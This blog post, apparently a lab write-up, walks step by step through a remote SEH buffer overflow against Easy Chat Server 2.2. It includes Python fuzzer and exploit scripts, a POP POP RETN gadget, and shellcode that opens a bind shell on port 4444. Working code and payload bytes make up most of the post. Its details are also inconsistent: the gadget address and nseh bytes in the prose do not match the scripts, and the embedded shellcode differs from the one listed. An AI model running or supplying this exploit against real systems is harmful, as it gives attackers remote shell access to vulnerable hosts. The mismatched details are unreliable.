Information Security 軍陣: BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

Oke, now i try fuzzing easy chat server 2.2 with remote method. Let's complete the task :

1. Observation Aplication easy chat server.

==> Registration Form

==> IP dan port which uses ==> 192.168.56.101:80/443

==>User who have created.

==> Chat room and the rules.

==> Accessed by IP address 192.168.56.101 ( default http port 80 ).

==> Enter Fisrt Chat Room ==> only this room allow guest user login.

** Look the url to get clue: http://192.168.56.101/chat.ghp?username=guest&password=&room=1&sex=1

2. Looking for header for create fuzzer.
==> Capture trafic with wireshark.
==> Login with guest user and analyse the captured traffic on wireshark.

==> Lets see the header on same with url above:
GET /chat.ghp?username=guest&password=&room=1&sex=1 HTTP/1.1

2. Create Fuzzer with header above.

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x41"*5000
payload=("GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1 \r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

3. Running fuzzer and see impact with ollydbg.

==> View SEH chain contain 41414141 ==> Shift + F9

==> EIP overwrited.

4. Create pattern to look offset position.

==> Effect of fuzzer with pattern.

==> EIP overwrited 68413368
==> Cek pattern offset.

==> Pattern offset potition ==> 220

5. Looking for third party .dll module to get POP POP RETN

     ==> There are two module from easy chat which can use libeay32.dll or
              ssleay32.dll
     ==>I use ssleay because not contain 00 char.

    ==> POP POP RETN address ==> 10013814 ==> \x14\x38\x01\x10
    ==> nonseh ==> \xeb\08\x90\x90

6. Modify Fuzzer with structure: nop+nseh+seh

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

==> Result true==> ssleay32

7. Generate shellcode with msfweb.
==> Bad Char==> x20

==> Generate Payload

/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" "\xd5\xde\xe8\x83\xeb\xfc\xe2\xf4\x98\xbf\x35\xa5\x8c\x2c\x21\x17" "\x9b\xb5\x55\x84\x40\xf1\x55\xad\x58\x5e\xa2\xed\x1c\xd4\x31\x63" "\x2b\xcd\x55\xb7\x44\xd4\x35\xa1\xef\xe1\x55\xe9\x8a\xe4\x1e\x71" "\xc8\x51\x1e\x9c\x63\x14\x14\xe5\x65\x17\x35\x1c\x5f\x81\xfa\xc0" "\x11\x30\x55\xb7\x40\xd4\x35\x8e\xef\xd9\x95\x63\x3b\xc9\xdf\x03" "\x67\xf9\x55\x61\x08\xf1\xc2\x89\xa7\xe4\x05\x8c\xef\x96\xee\x63" "\x24\xd9\x55\x98\x78\x78\x55\xa8\x6c\x8b\xb6\x66\x2a\xdb\x32\xb8" "\x9b\x03\xb8\xbb\x02\xbd\xed\xda\x0c\xa2\xad\xda\x3b\x81\x21\x38" "\x0c\x1e\x33\x14\x5f\x85\x21\x3e\x3b\x5c\x3b\x8e\xe5\x38\xd6\xea" "\x31\xbf\xdc\x17\xb4\xbd\x07\xe1\x91\x78\x89\x17\xb2\x86\x8d\xbb" "\x37\x86\x9d\xbb\x27\x86\x21\x38\x02\xbd\xcf\xb4\x02\x86\x57\x09" "\xf1\xbd\x7a\xf2\x14\x12\x89\x17\xb2\xbf\xce\xb9\x31\x2a\x0e\x80" "\xc0\x78\xf0\x01\x33\x2a\x08\xbb\x31\x2a\x0e\x80\x81\x9c\x58\xa1" "\x33\x2a\x08\xb8\x30\x81\x8b\x17\xb4\x46\xb6\x0f\x1d\x13\xa7\xbf" "\x9b\x03\x8b\x17\xb4\xb3\xb4\x8c\x02\xbd\xbd\x85\xed\x30\xb4\xb8" "\x3d\xfc\x12\x61\x83\xbf\x9a\x61\x86\xe4\x1e\x1b\xce\x2b\x9c\xc5" "\x9a\x97\xf2\x7b\xe9\xaf\xe6\x43\xcf\x7e\xb6\x9a\x9a\x66\xc8\x17" "\x11\x91\x21\x3e\x3f\x82\x8c\xb9\x35\x84\xb4\xe9\x35\x84\x8b\xb9" "\x9b\x05\xb6\x45\xbd\xd0\x10\xbb\x9b\x03\xb4\x17\x9b\xe2\x21\x38" "\xef\x82\x22\x6b\xa0\xb1\x21\x3e\x36\x2a\x0e\x80\x94\x5f\xda\xb7" "\x37\x2a\x08\x17\xb4\xd5\xde\xe8";

8. Modify Fuzzer with structure : nop+nseh+seh+nop+shellcode

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x57\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x6b\x4c\x61"
"\x7a\x4a\x4b\x70\x4d\x4d\x38\x4a\x59\x6b\x4f\x4b\x4f\x69\x6f\x51"
"\x70\x4c\x4b\x70\x6c\x74\x64\x54\x64\x4e\x6b\x77\x35\x67\x4c\x4c"
"\x4b\x33\x4c\x37\x75\x62\x58\x35\x51\x6a\x4f\x6c\x4b\x50\x4f\x55"
"\x48\x4e\x6b\x51\x4f\x77\x50\x66\x61\x7a\x4b\x71\x59\x6e\x6b\x50"
"\x34\x6c\x4b\x65\x51\x7a\x4e\x44\x71\x6b\x70\x4f\x69\x6c\x6c\x4e"
"\x64\x79\x50\x43\x44\x53\x37\x49\x51\x6b\x7a\x56\x6d\x36\x61\x4f"
"\x32\x4a\x4b\x5a\x54\x37\x4b\x46\x34\x46\x44\x71\x38\x42\x55\x69"
"\x75\x4e\x6b\x41\x4f\x57\x54\x53\x31\x7a\x4b\x71\x76\x6c\x4b\x76"
"\x6c\x30\x4b\x4e\x6b\x41\x4f\x57\x6c\x74\x41\x7a\x4b\x35\x53\x66"
"\x4c\x6e\x6b\x4d\x59\x70\x6c\x64\x64\x65\x4c\x73\x51\x49\x53\x70"
"\x31\x6b\x6b\x75\x34\x4e\x6b\x37\x33\x30\x30\x6c\x4b\x37\x30\x44"
"\x4c\x4c\x4b\x30\x70\x37\x6c\x6c\x6d\x6e\x6b\x51\x50\x53\x38\x63"
"\x6e\x63\x58\x4c\x4e\x62\x6e\x76\x6e\x7a\x4c\x72\x70\x39\x6f\x4e"
"\x36\x61\x76\x36\x33\x43\x56\x61\x78\x45\x63\x30\x32\x51\x78\x44"
"\x37\x70\x73\x64\x72\x33\x6f\x66\x34\x39\x6f\x68\x50\x45\x38\x68"
"\x4b\x58\x6d\x59\x6c\x35\x6b\x36\x30\x6b\x4f\x78\x56\x73\x6f\x6f"
"\x79\x49\x75\x52\x46\x4c\x41\x38\x6d\x45\x58\x56\x62\x30\x55\x51"
"\x7a\x77\x72\x69\x6f\x4a\x70\x35\x38\x6b\x69\x77\x79\x49\x65\x6e"
"\x4d\x73\x67\x4b\x4f\x59\x46\x71\x43\x36\x33\x36\x33\x70\x53\x56"
"\x33\x50\x43\x72\x73\x43\x73\x33\x63\x79\x6f\x5a\x70\x62\x46\x73"
"\x58\x64\x51\x63\x6c\x55\x36\x42\x73\x6c\x49\x4b\x51\x6e\x75\x30"
"\x68\x6c\x64\x46\x7a\x42\x50\x6f\x37\x32\x77\x79\x6f\x7a\x76\x31"
"\x7a\x52\x30\x43\x61\x61\x45\x6b\x4f\x6e\x30\x35\x38\x6e\x44\x4c"
"\x6d\x74\x6e\x6d\x39\x36\x37\x6b\x4f\x4b\x66\x61\x43\x42\x75\x4b"
"\x4f\x58\x50\x75\x38\x4d\x35\x70\x49\x6c\x46\x50\x49\x53\x67\x4b"
"\x4f\x6a\x76\x46\x30\x53\x64\x62\x74\x61\x45\x6b\x4f\x4a\x70\x6f"
"\x63\x45\x38\x6b\x57\x32\x59\x59\x56\x61\x69\x73\x67\x79\x6f\x6b"
"\x66\x31\x45\x49\x6f\x38\x50\x52\x46\x52\x4a\x61\x74\x65\x36\x62"
"\x48\x51\x73\x50\x6d\x6f\x79\x6a\x45\x51\x7a\x76\x30\x42\x79\x77"
"\x59\x5a\x6c\x6f\x79\x68\x67\x73\x5a\x42\x64\x6c\x49\x4a\x42\x50"
"\x31\x6f\x30\x4b\x43\x4e\x4a\x4b\x4e\x61\x52\x56\x4d\x59\x6e\x30"
"\x42\x66\x4c\x4c\x53\x4e\x6d\x31\x6a\x50\x38\x6e\x4b\x6e\x4b\x6c"
"\x6b\x45\x38\x31\x62\x79\x6e\x4f\x43\x55\x46\x49\x6f\x72\x55\x52"
"\x64\x59\x6f\x78\x56\x33\x6b\x72\x77\x43\x62\x36\x31\x72\x71\x61"
"\x41\x62\x4a\x43\x31\x66\x31\x46\x31\x63\x65\x70\x51\x6b\x4f\x6a"
"\x70\x33\x58\x6c\x6d\x79\x49\x63\x35\x4a\x6e\x43\x63\x4b\x4f\x6e"
"\x36\x41\x7a\x39\x6f\x59\x6f\x30\x37\x79\x6f\x6e\x30\x4c\x4b\x70"
"\x57\x6b\x4c\x6c\x43\x48\x44\x71\x74\x39\x6f\x48\x56\x63\x62\x49"
"\x6f\x5a\x70\x71\x78\x6a\x50\x4c\x4a\x76\x64\x53\x6f\x73\x63\x6b"
"\x4f\x79\x46\x4b\x4f\x48\x50\x47")
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

9. Execute payload and telnet to 4444 port.

===================================================================================
===================================================================================

Information Security 軍陣

ROOT

=======================================================

Monday, October 8, 2012

BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

No comments:

Post a Comment

My Classmate